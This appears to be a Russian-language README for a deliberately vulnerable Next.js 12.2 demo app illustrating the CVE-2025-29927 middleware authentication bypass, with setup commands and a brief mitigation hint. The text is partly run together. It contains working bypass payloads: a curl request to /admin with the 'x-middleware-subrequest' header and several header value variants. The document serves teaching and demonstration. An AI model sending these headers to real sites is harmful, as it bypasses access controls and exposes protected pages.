
🔓 Демонстрация обхода аутентификации Next.js - Обучающее приложение, демонстрирующее уязвимость обхода аутентификации промежуточного ПО CVE-2025-29927 . ⚠️ Только для образовательных целей.[Сделано с помощью ИИ]
Простое приложение-демонстрация концепции на Next.js 12.2.
npm install
npm run dev
Приложение будет доступно по адресу http://localhost:3000
npm run dev - Запуск сервера разработкиnpm run build - Сборка для продакшенаnpm run start - Запуск продакшен-сервераИзмените pages/index.js, чтобы модифицировать страницу Hello World. Приложение использует встроенные стили для простоты, но вы можете добавить CSS-файлы или библиотеки стилей по необходимости.
Это приложение демонстрирует уязвимость CVE-2025-29927, обнаруженную Rachid.A (zhero) и Yasser Allam (inzo_):
x-middleware-subrequestadminadminx-middleware-subrequest: middlewarecurl -H "x-middleware-subrequest: middleware" http://localhost:3000/adminx-middleware-subrequest: middlewarex-middleware-subrequest: src/middlewarex-middleware-subrequest: middleware:middleware:middleware:middleware:middlewarex-middleware-subrequest на уровне прокси/CDN⚠️ ПРЕДУПРЕЖДЕНИЕ: Это демонстрирует реальную CVE только в образовательных целях!
Это приложение использует встроенные стили для простоты. Для продакшен-приложения рассмотрите использование:
Удачного кодинга! 🚀